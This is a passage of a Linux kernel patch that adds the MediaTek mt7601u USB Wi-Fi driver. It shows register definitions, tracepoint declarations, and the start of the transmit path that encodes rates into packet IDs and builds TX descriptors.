MT_OFDM_PROT_CFG 0x1368 +#define MT_MM20_PROT_CFG 0x136c +#define MT_MM40_PROT_CFG 0x1370 +#define MT_GF20_PROT_CFG 0x1374 +#define MT_GF40_PROT_CFG 0x1378 + +#define MT_PROT_RATE GENMASK(15, 0) +#define MT_PROT_CTRL_RTS_CTS BIT(16) +#define MT_PROT_CTRL_CTS2SELF BIT(17) +#define MT_PROT_NAV_SHORT BIT(18) +#define MT_PROT_NAV_LONG BIT(19) +#define MT_PROT_TXOP_ALLOW_CCK BIT(20) +#define MT_PROT_TXOP_ALLOW_OFDM BIT(21) +#define MT_PROT_TXOP_ALLOW_MM20 BIT(22) +#define MT_PROT_TXOP_ALLOW_MM40 BIT(23) +#define MT_PROT_TXOP_ALLOW_GF20 BIT(24) +#define MT_PROT_TXOP_ALLOW_GF40 BIT(25) +#define MT_PROT_RTS_THR_EN BIT(26) +#define MT_PROT_RATE_CCK_11 0x0003 +#define MT_PROT_RATE_OFDM_6 0x4000 +#define MT_PROT_RATE_OFDM_24 0x4004 +#define MT_PROT_RATE_DUP_OFDM_24 0x4084 +#define MT_PROT_TXOP_ALLOW_ALL GENMASK(25, 20) +#define MT_PROT_TXOP_ALLOW_BW20 (MT_PROT_TXOP_ALLOW_ALL & \ + ~MT_PROT_TXOP_ALLOW_MM40 & \ + ~MT_PROT_TXOP_ALLOW_GF40) + +#define MT_EXP_ACK_TIME 0x1380 + +#define MT_TX_PWR_CFG_0_EXT 0x1390 +#define MT_TX_PWR_CFG_1_EXT 0x1394 + +#define MT_TX_FBK_LIMIT 0x1398 +#define MT_TX_FBK_LIMIT_MPDU_FBK GENMASK(7, 0) +#define MT_TX_FBK_LIMIT_AMPDU_FBK GENMASK(15, 8) +#define MT_TX_FBK_LIMIT_MPDU_UP_CLEAR BIT(16) +#define MT_TX_FBK_LIMIT_AMPDU_UP_CLEAR BIT(17) +#define MT_TX_FBK_LIMIT_RATE_LUT BIT(18) + +#define MT_TX0_RF_GAIN_CORR 0x13a0 +#define MT_TX1_RF_GAIN_CORR 0x13a4 +#define MT_TX0_RF_GAIN_ATTEN 0x13a8 + +#define MT_TX_ALC_CFG_0 0x13b0 +#define MT_TX_ALC_CFG_0_CH_INIT_0 GENMASK(5, 0) +#define MT_TX_ALC_CFG_0_CH_INIT_1 GENMASK(13, 8) +#define MT_TX_ALC_CFG_0_LIMIT_0 GENMASK(21, 16) +#define MT_TX_ALC_CFG_0_LIMIT_1 GENMASK(29, 24) + +#define MT_TX_ALC_CFG_1 0x13b4 +#define MT_TX_ALC_CFG_1_TEMP_COMP GENMASK(5, 0) + +#define MT_TX_ALC_CFG_2 0x13a8 +#define MT_TX_ALC_CFG_2_TEMP_COMP GENMASK(5, 0) + +#define MT_TX0_BB_GAIN_ATTEN 0x13c0 + +#define MT_TX_ALC_VGA3 0x13c8 + +#define MT_TX_PROT_CFG6 0x13e0 +#define MT_TX_PROT_CFG7 0x13e4 +#define MT_TX_PROT_CFG8 0x13e8 + +#define MT_PIFS_TX_CFG 0x13ec + +#define MT_RX_FILTR_CFG 0x1400 + +#define MT_RX_FILTR_CFG_CRC_ERR BIT(0) +#define MT_RX_FILTR_CFG_PHY_ERR BIT(1) +#define MT_RX_FILTR_CFG_PROMISC BIT(2) +#define MT_RX_FILTR_CFG_OTHER_BSS BIT(3) +#define MT_RX_FILTR_CFG_VER_ERR BIT(4) +#define MT_RX_FILTR_CFG_MCAST BIT(5) +#define MT_RX_FILTR_CFG_BCAST BIT(6) +#define MT_RX_FILTR_CFG_DUP BIT(7) +#define MT_RX_FILTR_CFG_CFACK BIT(8) +#define MT_RX_FILTR_CFG_CFEND BIT(9) +#define MT_RX_FILTR_CFG_ACK BIT(10) +#define MT_RX_FILTR_CFG_CTS BIT(11) +#define MT_RX_FILTR_CFG_RTS BIT(12) +#define MT_RX_FILTR_CFG_PSPOLL BIT(13) +#define MT_RX_FILTR_CFG_BA BIT(14) +#define MT_RX_FILTR_CFG_BAR BIT(15) +#define MT_RX_FILTR_CFG_CTRL_RSV BIT(16) + +#define MT_AUTO_RSP_CFG 0x1404 + +#define MT_AUTO_RSP_PREAMB_SHORT BIT(4) + +#define MT_LEGACY_BASIC_RATE 0x1408 +#define MT_HT_BASIC_RATE 0x140c + +#define MT_RX_PARSER_CFG 0x1418 +#define MT_RX_PARSER_RX_SET_NAV_ALL BIT(0) + +#define MT_EXT_CCA_CFG 0x141c +#define MT_EXT_CCA_CFG_CCA0 GENMASK(1, 0) +#define MT_EXT_CCA_CFG_CCA1 GENMASK(3, 2) +#define MT_EXT_CCA_CFG_CCA2 GENMASK(5, 4) +#define MT_EXT_CCA_CFG_CCA3 GENMASK(7, 6) +#define MT_EXT_CCA_CFG_CCA_MASK GENMASK(11, 8) +#define MT_EXT_CCA_CFG_ED_CCA_MASK GENMASK(15, 12) + +#define MT_TX_SW_CFG3 0x1478 + +#define MT_PN_PAD_MODE 0x150c + +#define MT_TXOP_HLDR_ET 0x1608 + +#define MT_PROT_AUTO_TX_CFG 0x1648 + +#define MT_RX_STA_CNT0 0x1700 +#define MT_RX_STA_CNT1 0x1704 +#define MT_RX_STA_CNT2 0x1708 +#define MT_TX_STA_CNT0 0x170c +#define MT_TX_STA_CNT1 0x1710 +#define MT_TX_STA_CNT2 0x1714 + +/* Vendor driver defines content of the second word of STAT_FIFO as follows: + * MT_TX_STAT_FIFO_RATE GENMASK(26, 16) + * MT_TX_STAT_FIFO_ETXBF BIT(27) + * MT_TX_STAT_FIFO_SND BIT(28) + * MT_TX_STAT_FIFO_ITXBF BIT(29) + * However, tests show that b16-31 have the same layout as TXWI rate_ctl + * with rate set to rate at which frame was acked. + */ +#define MT_TX_STAT_FIFO 0x1718 +#define MT_TX_STAT_FIFO_VALID BIT(0) +#define MT_TX_STAT_FIFO_PID_TYPE GENMASK(4, 1) +#define MT_TX_STAT_FIFO_SUCCESS BIT(5) +#define MT_TX_STAT_FIFO_AGGR BIT(6) +#define MT_TX_STAT_FIFO_ACKREQ BIT(7) +#define MT_TX_STAT_FIFO_WCID GENMASK(15, 8) +#define MT_TX_STAT_FIFO_RATE GENMASK(31, 16) + +#define MT_TX_AGG_STAT 0x171c + +#define MT_TX_AGG_CNT_BASE0 0x1720 + +#define MT_MPDU_DENSITY_CNT 0x1740 + +#define MT_TX_AGG_CNT_BASE1 0x174c + +#define MT_TX_AGG_CNT(_id) ((_id) < 8 ? \ + MT_TX_AGG_CNT_BASE0 + ((_id) << 2) : \ + MT_TX_AGG_CNT_BASE1 + ((_id - 8) << 2)) + +#define MT_TX_STAT_FIFO_EXT 0x1798 +#define MT_TX_STAT_FIFO_EXT_RETRY GENMASK(7, 0) + +#define MT_BBP_CORE_BASE 0x2000 +#define MT_BBP_IBI_BASE 0x2100 +#define MT_BBP_AGC_BASE 0x2300 +#define MT_BBP_TXC_BASE 0x2400 +#define MT_BBP_RXC_BASE 0x2500 +#define MT_BBP_TXO_BASE 0x2600 +#define MT_BBP_TXBE_BASE 0x2700 +#define MT_BBP_RXFE_BASE 0x2800 +#define MT_BBP_RXO_BASE 0x2900 +#define MT_BBP_DFS_BASE 0x2a00 +#define MT_BBP_TR_BASE 0x2b00 +#define MT_BBP_CAL_BASE 0x2c00 +#define MT_BBP_DSC_BASE 0x2e00 +#define MT_BBP_PFMU_BASE 0x2f00 + +#define MT_BBP(_type, _n) (MT_BBP_##_type##_BASE + ((_n) << 2)) + +#define MT_BBP_CORE_R1_BW GENMASK(4, 3) + +#define MT_BBP_AGC_R0_CTRL_CHAN GENMASK(9, 8) +#define MT_BBP_AGC_R0_BW GENMASK(14, 12) + +/* AGC, R4/R5 */ +#define MT_BBP_AGC_LNA_GAIN GENMASK(21, 16) + +/* AGC, R8/R9 */ +#define MT_BBP_AGC_GAIN GENMASK(14, 8) + +#define MT_BBP_AGC20_RSSI0 GENMASK(7, 0) +#define MT_BBP_AGC20_RSSI1 GENMASK(15, 8) + +#define MT_BBP_TXBE_R0_CTRL_CHAN GENMASK(1, 0) + +#define MT_WCID_ADDR_BASE 0x1800 +#define MT_WCID_ADDR(_n) (MT_WCID_ADDR_BASE + (_n) * 8) + +#define MT_SRAM_BASE 0x4000 + +#define MT_WCID_KEY_BASE 0x8000 +#define MT_WCID_KEY(_n) (MT_WCID_KEY_BASE + (_n) * 32) + +#define MT_WCID_IV_BASE 0xa000 +#define MT_WCID_IV(_n) (MT_WCID_IV_BASE + (_n) * 8) + +#define MT_WCID_ATTR_BASE 0xa800 +#define MT_WCID_ATTR(_n) (MT_WCID_ATTR_BASE + (_n) * 4) + +#define MT_WCID_ATTR_PAIRWISE BIT(0) +#define MT_WCID_ATTR_PKEY_MODE GENMASK(3, 1) +#define MT_WCID_ATTR_BSS_IDX GENMASK(6, 4) +#define MT_WCID_ATTR_RXWI_UDF GENMASK(9, 7) +#define MT_WCID_ATTR_PKEY_MODE_EXT BIT(10) +#define MT_WCID_ATTR_BSS_IDX_EXT BIT(11) +#define MT_WCID_ATTR_WAPI_MCBC BIT(15) +#define MT_WCID_ATTR_WAPI_KEYID GENMASK(31, 24) + +#define MT_SKEY_BASE_0 0xac00 +#define MT_SKEY_BASE_1 0xb400 +#define MT_SKEY_0(_bss, _idx) \ + (MT_SKEY_BASE_0 + (4 * (_bss) + _idx) * 32) +#define MT_SKEY_1(_bss, _idx) \ + (MT_SKEY_BASE_1 + (4 * ((_bss) & 7) + _idx) * 32) +#define MT_SKEY(_bss, _idx) \ + ((_bss & 8) ? MT_SKEY_1(_bss, _idx) : MT_SKEY_0(_bss, _idx)) + +#define MT_SKEY_MODE_BASE_0 0xb000 +#define MT_SKEY_MODE_BASE_1 0xb3f0 +#define MT_SKEY_MODE_0(_bss) \ + (MT_SKEY_MODE_BASE_0 + ((_bss / 2) << 2)) +#define MT_SKEY_MODE_1(_bss) \ + (MT_SKEY_MODE_BASE_1 + ((((_bss) & 7) / 2) << 2)) +#define MT_SKEY_MODE(_bss) \ + ((_bss & 8) ? MT_SKEY_MODE_1(_bss) : MT_SKEY_MODE_0(_bss)) +#define MT_SKEY_MODE_MASK GENMASK(3, 0) +#define MT_SKEY_MODE_SHIFT(_bss, _idx) (4 * ((_idx) + 4 * (_bss & 1))) + +#define MT_BEACON_BASE 0xc000 + +#define MT_TEMP_SENSOR 0x1d000 +#define MT_TEMP_SENSOR_VAL GENMASK(6, 0) + +enum mt76_cipher_type { + MT_CIPHER_NONE, + MT_CIPHER_WEP40, + MT_CIPHER_WEP104, + MT_CIPHER_TKIP, + MT_CIPHER_AES_CCMP, + MT_CIPHER_CKIP40, + MT_CIPHER_CKIP104, + MT_CIPHER_CKIP128, + MT_CIPHER_WAPI, +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/trace.c b/drivers/net/wireless/mediatek/mt7601u/trace.c new file mode 100644 index 000000000000..8abdd3cd546d --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/trace.c @@ -0,0 +1,21 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include + +#ifndef __CHECKER__ +#define CREATE_TRACE_POINTS +#include "trace.h" + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/trace.h b/drivers/net/wireless/mediatek/mt7601u/trace.h new file mode 100644 index 000000000000..289897300ef0 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/trace.h @@ -0,0 +1,400 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#if !defined(__MT7601U_TRACE_H) || defined(TRACE_HEADER_MULTI_READ) +#define __MT7601U_TRACE_H + +#include +#include "mt7601u.h" +#include "mac.h" + +#undef TRACE_SYSTEM +#define TRACE_SYSTEM mt7601u + +#define MAXNAME 32 +#define DEV_ENTRY __array(char, wiphy_name, 32) +#define DEV_ASSIGN strlcpy(__entry->wiphy_name, \ + wiphy_name(dev->hw->wiphy), MAXNAME) +#define DEV_PR_FMT "%s " +#define DEV_PR_ARG __entry->wiphy_name + +#define REG_ENTRY __field(u32, reg) __field(u32, val) +#define REG_ASSIGN __entry->reg = reg; __entry->val = val +#define REG_PR_FMT "%04x=%08x" +#define REG_PR_ARG __entry->reg, __entry->val + +DECLARE_EVENT_CLASS(dev_reg_evt, + TP_PROTO(struct mt7601u_dev *dev, u32 reg, u32 val), + TP_ARGS(dev, reg, val), + TP_STRUCT__entry( + DEV_ENTRY + REG_ENTRY + ), + TP_fast_assign( + DEV_ASSIGN; + REG_ASSIGN; + ), + TP_printk( + DEV_PR_FMT REG_PR_FMT, + DEV_PR_ARG, REG_PR_ARG + ) +); + +DEFINE_EVENT(dev_reg_evt, reg_read, + TP_PROTO(struct mt7601u_dev *dev, u32 reg, u32 val), + TP_ARGS(dev, reg, val) +); + +DEFINE_EVENT(dev_reg_evt, reg_write, + TP_PROTO(struct mt7601u_dev *dev, u32 reg, u32 val), + TP_ARGS(dev, reg, val) +); + +TRACE_EVENT(mt_submit_urb, + TP_PROTO(struct mt7601u_dev *dev, struct urb *u), + TP_ARGS(dev, u), + TP_STRUCT__entry( + DEV_ENTRY __field(unsigned, pipe) __field(u32, len) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->pipe = u->pipe; + __entry->len = u->transfer_buffer_length; + ), + TP_printk(DEV_PR_FMT "p:%08x len:%u", + DEV_PR_ARG, __entry->pipe, __entry->len) +); + +#define trace_mt_submit_urb_sync(__dev, __pipe, __len) ({ \ + struct urb u; \ + u.pipe = __pipe; \ + u.transfer_buffer_length = __len; \ + trace_mt_submit_urb(__dev, &u); \ +}) + +TRACE_EVENT(mt_mcu_msg_send, + TP_PROTO(struct mt7601u_dev *dev, + struct sk_buff *skb, u32 csum, bool resp), + TP_ARGS(dev, skb, csum, resp), + TP_STRUCT__entry( + DEV_ENTRY + __field(u32, info) + __field(u32, csum) + __field(bool, resp) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->info = *(u32 *)skb->data; + __entry->csum = csum; + __entry->resp = resp; + ), + TP_printk(DEV_PR_FMT "i:%08x c:%08x r:%d", + DEV_PR_ARG, __entry->info, __entry->csum, __entry->resp) +); + +TRACE_EVENT(mt_vend_req, + TP_PROTO(struct mt7601u_dev *dev, unsigned pipe, u8 req, u8 req_type, + u16 val, u16 offset, void *buf, size_t buflen, int ret), + TP_ARGS(dev, pipe, req, req_type, val, offset, buf, buflen, ret), + TP_STRUCT__entry( + DEV_ENTRY + __field(unsigned, pipe) __field(u8, req) __field(u8, req_type) + __field(u16, val) __field(u16, offset) __field(void*, buf) + __field(int, buflen) __field(int, ret) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->pipe = pipe; + __entry->req = req; + __entry->req_type = req_type; + __entry->val = val; + __entry->offset = offset; + __entry->buf = buf; + __entry->buflen = buflen; + __entry->ret = ret; + ), + TP_printk(DEV_PR_FMT + "%d p:%08x req:%02hhx %02hhx val:%04hx %04hx buf:%d %d", + DEV_PR_ARG, __entry->ret, __entry->pipe, __entry->req, + __entry->req_type, __entry->val, __entry->offset, + !!__entry->buf, __entry->buflen) +); + +TRACE_EVENT(ee_read, + TP_PROTO(struct mt7601u_dev *dev, int offset, u16 val), + TP_ARGS(dev, offset, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(int, o) __field(u16, v) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->o = offset; + __entry->v = val; + ), + TP_printk(DEV_PR_FMT "%04x=%04x", DEV_PR_ARG, __entry->o, __entry->v) +); + +DECLARE_EVENT_CLASS(dev_rf_reg_evt, + TP_PROTO(struct mt7601u_dev *dev, u8 bank, u8 reg, u8 val), + TP_ARGS(dev, bank, reg, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, bank) + __field(u8, reg) + __field(u8, val) + ), + TP_fast_assign( + DEV_ASSIGN; + REG_ASSIGN; + __entry->bank = bank; + ), + TP_printk( + DEV_PR_FMT "%02hhx:%02hhx=%02hhx", + DEV_PR_ARG, __entry->bank, __entry->reg, __entry->val + ) +); + +DEFINE_EVENT(dev_rf_reg_evt, rf_read, + TP_PROTO(struct mt7601u_dev *dev, u8 bank, u8 reg, u8 val), + TP_ARGS(dev, bank, reg, val) +); + +DEFINE_EVENT(dev_rf_reg_evt, rf_write, + TP_PROTO(struct mt7601u_dev *dev, u8 bank, u8 reg, u8 val), + TP_ARGS(dev, bank, reg, val) +); + +DECLARE_EVENT_CLASS(dev_bbp_reg_evt, + TP_PROTO(struct mt7601u_dev *dev, u8 reg, u8 val), + TP_ARGS(dev, reg, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, reg) + __field(u8, val) + ), + TP_fast_assign( + DEV_ASSIGN; + REG_ASSIGN; + ), + TP_printk( + DEV_PR_FMT "%02hhx=%02hhx", + DEV_PR_ARG, __entry->reg, __entry->val + ) +); + +DEFINE_EVENT(dev_bbp_reg_evt, bbp_read, + TP_PROTO(struct mt7601u_dev *dev, u8 reg, u8 val), + TP_ARGS(dev, reg, val) +); + +DEFINE_EVENT(dev_bbp_reg_evt, bbp_write, + TP_PROTO(struct mt7601u_dev *dev, u8 reg, u8 val), + TP_ARGS(dev, reg, val) +); + +DECLARE_EVENT_CLASS(dev_simple_evt, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, val) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->val = val; + ), + TP_printk( + DEV_PR_FMT "%02hhx", DEV_PR_ARG, __entry->val + ) +); + +DEFINE_EVENT(dev_simple_evt, temp_mode, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +DEFINE_EVENT(dev_simple_evt, read_temp, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +DEFINE_EVENT(dev_simple_evt, freq_cal_adjust, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +TRACE_EVENT(freq_cal_offset, + TP_PROTO(struct mt7601u_dev *dev, u8 phy_mode, s8 freq_off), + TP_ARGS(dev, phy_mode, freq_off), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, phy_mode) + __field(s8, freq_off) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->phy_mode = phy_mode; + __entry->freq_off = freq_off; + ), + TP_printk(DEV_PR_FMT "phy:%02hhx off:%02hhx", + DEV_PR_ARG, __entry->phy_mode, __entry->freq_off) +); + +TRACE_EVENT(mt_rx, + TP_PROTO(struct mt7601u_dev *dev, struct mt7601u_rxwi *rxwi, u32 f), + TP_ARGS(dev, rxwi, f), + TP_STRUCT__entry( + DEV_ENTRY + __field_struct(struct mt7601u_rxwi, rxwi) + __field(u32, fce_info) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->rxwi = *rxwi; + __entry->fce_info = f; + ), + TP_printk(DEV_PR_FMT "rxi:%08x ctl:%08x frag_sn:%04hx rate:%04hx " + "uknw:%02hhx z:%02hhx%02hhx%02hhx snr:%02hhx " + "ant:%02hhx gain:%02hhx freq_o:%02hhx " + "r:%08x ea:%08x fce:%08x", DEV_PR_ARG, + le32_to_cpu(__entry->rxwi.rxinfo), + le32_to_cpu(__entry->rxwi.ctl), + le16_to_cpu(__entry->rxwi.frag_sn), + le16_to_cpu(__entry->rxwi.rate), + __entry->rxwi.unknown, + __entry->rxwi.zero[0], __entry->rxwi.zero[1], + __entry->rxwi.zero[2], + __entry->rxwi.snr, __entry->rxwi.ant, + __entry->rxwi.gain, __entry->rxwi.freq_off, + __entry->rxwi.resv2, __entry->rxwi.expert_ant, + __entry->fce_info) +); + +TRACE_EVENT(mt_tx, + TP_PROTO(struct mt7601u_dev *dev, struct sk_buff *skb, + struct mt76_sta *sta, struct mt76_txwi *h), + TP_ARGS(dev, skb, sta, h), + TP_STRUCT__entry( + DEV_ENTRY + __field_struct(struct mt76_txwi, h) + __field(struct sk_buff *, skb) + __field(struct mt76_sta *, sta) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->h = *h; + __entry->skb = skb; + __entry->sta = sta; + ), + TP_printk(DEV_PR_FMT "skb:%p sta:%p flg:%04hx rate_ctl:%04hx " + "ack:%02hhx wcid:%02hhx len_ctl:%05hx", DEV_PR_ARG, + __entry->skb, __entry->sta, + le16_to_cpu(__entry->h.flags), + le16_to_cpu(__entry->h.rate_ctl), + __entry->h.ack_ctl, __entry->h.wcid, + le16_to_cpu(__entry->h.len_ctl)) +); + +TRACE_EVENT(mt_tx_dma_done, + TP_PROTO(struct mt7601u_dev *dev, struct sk_buff *skb), + TP_ARGS(dev, skb), + TP_STRUCT__entry( + DEV_ENTRY + __field(struct sk_buff *, skb) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->skb = skb; + ), + TP_printk(DEV_PR_FMT "%p", DEV_PR_ARG, __entry->skb) +); + +TRACE_EVENT(mt_tx_status_cleaned, + TP_PROTO(struct mt7601u_dev *dev, int cleaned), + TP_ARGS(dev, cleaned), + TP_STRUCT__entry( + DEV_ENTRY + __field(int, cleaned) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->cleaned = cleaned; + ), + TP_printk(DEV_PR_FMT "%d", DEV_PR_ARG, __entry->cleaned) +); + +TRACE_EVENT(mt_tx_status, + TP_PROTO(struct mt7601u_dev *dev, u32 stat1, u32 stat2), + TP_ARGS(dev, stat1, stat2), + TP_STRUCT__entry( + DEV_ENTRY + __field(u32, stat1) __field(u32, stat2) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->stat1 = stat1; + __entry->stat2 = stat2; + ), + TP_printk(DEV_PR_FMT "%08x %08x", + DEV_PR_ARG, __entry->stat1, __entry->stat2) +); + +TRACE_EVENT(mt_rx_dma_aggr, + TP_PROTO(struct mt7601u_dev *dev, int cnt, bool paged), + TP_ARGS(dev, cnt, paged), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, cnt) + __field(bool, paged) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->cnt = cnt; + __entry->paged = paged; + ), + TP_printk(DEV_PR_FMT "cnt:%d paged:%d", + DEV_PR_ARG, __entry->cnt, __entry->paged) +); + +DEFINE_EVENT(dev_simple_evt, set_key, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +TRACE_EVENT(set_shared_key, + TP_PROTO(struct mt7601u_dev *dev, u8 vid, u8 key), + TP_ARGS(dev, vid, key), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, vid) + __field(u8, key) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->vid = vid; + __entry->key = key; + ), + TP_printk(DEV_PR_FMT "phy:%02hhx off:%02hhx", + DEV_PR_ARG, __entry->vid, __entry->key) +); + +#endif + +#undef TRACE_INCLUDE_PATH +#define TRACE_INCLUDE_PATH . +#undef TRACE_INCLUDE_FILE +#define TRACE_INCLUDE_FILE trace + +#include diff --git a/drivers/net/wireless/mediatek/mt7601u/tx.c b/drivers/net/wireless/mediatek/mt7601u/tx.c new file mode 100644 index 000000000000..0be2080ceab3 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/tx.c @@ -0,0 +1,319 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "trace.h" + +enum mt76_txq_id { + MT_TXQ_VO = IEEE80211_AC_VO, + MT_TXQ_VI = IEEE80211_AC_VI, + MT_TXQ_BE = IEEE80211_AC_BE, + MT_TXQ_BK = IEEE80211_AC_BK, + MT_TXQ_PSD, + MT_TXQ_MCU, + __MT_TXQ_MAX +}; + +/* Hardware uses mirrored order of queues with Q0 having the highest priority */ +static u8 q2hwq(u8 q) +{ + return q ^ 0x3; +} + +/* Take mac80211 Q id from the skb and translate it to hardware Q id */ +static u8 skb2q(struct sk_buff *skb) +{ + int qid = skb_get_queue_mapping(skb); + + if (WARN_ON(qid >= MT_TXQ_PSD)) { + qid = MT_TXQ_BE; + skb_set_queue_mapping(skb, qid); + } + + return q2hwq(qid); +} + +/* Note: TX retry reporting is a bit broken. + * Retries are reported only once per AMPDU and often come a frame early + * i.e. they are reported in the last status preceding the AMPDU. Apart + * from the fact that it's hard to know the length of the AMPDU (which is + * required to know to how many consecutive frames retries should be + * applied), if status comes early on full FIFO it gets lost and retries + * of the whole AMPDU become invisible. + * As a work-around encode the desired rate in PKT_ID of TX descriptor + * and based on that guess the retries (every rate is tried once). + * Only downside here is that for MCS0 we have to rely solely on + * transmission failures as no retries can ever be reported. + * Not having to read EXT_FIFO has a nice effect of doubling the number + * of reports which can be fetched. + * Also the vendor driver never uses the EXT_FIFO register so it may be + * undertested. + */ +static u8 mt7601u_tx_pktid_enc(struct mt7601u_dev *dev, u8 rate, bool is_probe) +{ + u8 encoded = (rate + 1) + is_probe * 8; + + /* Because PKT_ID 0 disables status reporting only 15 values are + * available but 16 are needed (8 MCS * 2 for encoding is_probe) + * - we need to cram together two rates. MCS0 and MCS7 with is_probe + * share PKT_ID 9. + */ + if (is_probe && rate == 7) + return encoded - 7; + + return encoded; +} + +static void +mt7601u_tx_pktid_dec(struct mt7601u_dev *dev, struct mt76_tx_status *stat) +{ + u8 req_rate = stat->pktid; + u8 eff_rate = stat->rate & 0x7; + + req_rate -= 1; + + if (req_rate > 7) { + stat->is_probe = true; + req_rate -= 8; + + /* Decide between MCS0 and MCS7 which share pktid 9 */ + if (!req_rate && eff_rate) + req_rate = 7; + } + + stat->retry = req_rate - eff_rate; +} + +static void mt7601u_tx_skb_remove_dma_overhead(struct sk_buff *skb, + struct ieee80211_tx_info *info) +{ + int pkt_len = (unsigned long)info->status.status_driver_data[0]; + + skb_pull(skb, sizeof(struct mt76_txwi) + 4); + if (ieee80211_get_hdrlen_from_skb(skb) % 4) + mt76_remove_hdr_pad(skb); + + skb_trim(skb, pkt_len); +} + +void mt7601u_tx_status(struct mt7601u_dev *dev, struct sk_buff *skb) +{ + struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb); + + mt7601u_tx_skb_remove_dma_overhead(skb, info); + + ieee80211_tx_info_clear_status(info); + info->status.rates[0].idx = -1; + info->flags |= IEEE80211_TX_STAT_ACK; + ieee80211_tx_status(dev->hw, skb); +} + +static int mt7601u_skb_rooms(struct mt7601u_dev *dev, struct sk_buff *skb) +{ + int hdr_len = ieee80211_get_hdrlen_from_skb(skb); + u32 need_head; + + need_head = sizeof(struct mt76_txwi) + 4; + if (hdr_len % 4) + need_head += 2; + + return skb_cow(skb, need_head); +} + +static struct mt76_txwi * +mt7601u_push_txwi(struct mt7601u_dev *dev, struct sk_buff *skb, + struct ieee80211_sta *sta, struct mt76_wcid *wcid, + int pkt_len) +{ + struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb); + struct ieee80211_tx_rate *rate = &info->control.rates[0]; + struct mt76_txwi *txwi; + unsigned long flags; + bool is_probe; + u32 pkt_id; + u16 rate_ctl; + u8 nss; + + txwi = (struct mt76_txwi *)skb_push(skb, sizeof(struct mt76_txwi)); + memset(txwi, 0, sizeof(*txwi)); + + if (!wcid->tx_rate_set) + ieee80211_get_tx_rates(info->control.vif, sta, skb, + info->control.rates, 1); + + spin_lock_irqsave(&dev->lock, flags); + if (rate->idx < 0 || !rate->count) + rate_ctl = wcid->tx_rate; + else + rate_ctl = mt76_mac_tx_rate_val(dev, rate, &nss); + spin_unlock_irqrestore(&dev->lock, flags); + txwi->rate_ctl = cpu_to_le16(rate_ctl); + + if (!(info->flags & IEEE80211_TX_CTL_NO_ACK)) + txwi->ack_ctl |= MT_TXWI_ACK_CTL_REQ; + if (info->flags & IEEE80211_TX_CTL_ASSIGN_SEQ) + txwi->ack_ctl |= MT_TXWI_ACK_CTL_NSEQ; + + if ((info->flags & IEEE80211_TX_CTL_AMPDU) && sta) { + u8 ba_size = IEEE80211_MIN_AMPDU_BUF; + + ba_size <<= sta->ht_cap.ampdu_factor; + ba_size = min_t(int, 63, ba_size); + if (info->flags & IEEE80211_TX_CTL_RATE_CTRL_PROBE) + ba_size = 0; + txwi->ack_ctl |= MT76_SET(MT_TXWI_ACK_CTL_BA_WINDOW, ba_size); + + txwi->flags = cpu_to_le16(MT_TXWI_FLAGS_AMPDU | + MT76_SET(MT_TXWI_FLAGS_MPDU_DENSITY, + sta->ht_cap.ampdu_density)); + if (info->flags & IEEE80211_TX_CTL_RATE_CTRL_PROBE) + txwi->flags = 0; + } + + txwi->wcid = wcid->idx; + + is_probe = !!(info->flags & IEEE80211_TX_CTL_RATE_CTRL_PROBE); + pkt_id = mt7601u_tx_pktid_enc(dev, rate_ctl & 0x7, is_probe); + pkt_len |= MT76_SET(MT_TXWI_LEN_PKTID, pkt_id); + txwi->len_ctl = cpu_to_le16(pkt_len); + + return txwi; +} + 